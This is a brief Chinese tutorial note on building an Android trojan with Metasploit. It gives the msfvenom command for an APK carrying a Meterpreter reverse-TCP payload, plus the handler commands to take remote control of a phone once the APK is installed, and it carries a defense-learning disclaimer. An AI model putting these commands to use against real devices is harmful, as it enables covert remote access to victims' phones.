【笔记】msf生成安卓木马

发表于 更新于 阅读次数:

前言

msf生成安卓木马

本文仅用于网络信息防御学习

准备工作

  • 安卓手机

  • msf

生成安卓木马

<ip_address>:本机局域网ip地址
<port>:自定义端口号,用于监听木马程序
<name>:安装包名称

1
msfvenom -p android/meterpreter/reverse_tcp LHOST=<ip_address> LPORT=<port> R> ~/Downloads/<name>.apk

msf监听木马程序

1
2
3
4
5
6
msfconsole 
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <ip_address>
set LPORT <port>
exploit

木马利用

启受害者

  • 安装并启动木马程序

  • 本机返回Meterpreter session 1 opened,监听成功

攻击者

  • 上线后远程执行命令

  • 查看帮助

1
meterpreter > help

完成

  • 截图留念



参考文献

哔哩哔哩——Hai_Dog
哔哩哔哩——你会忘了我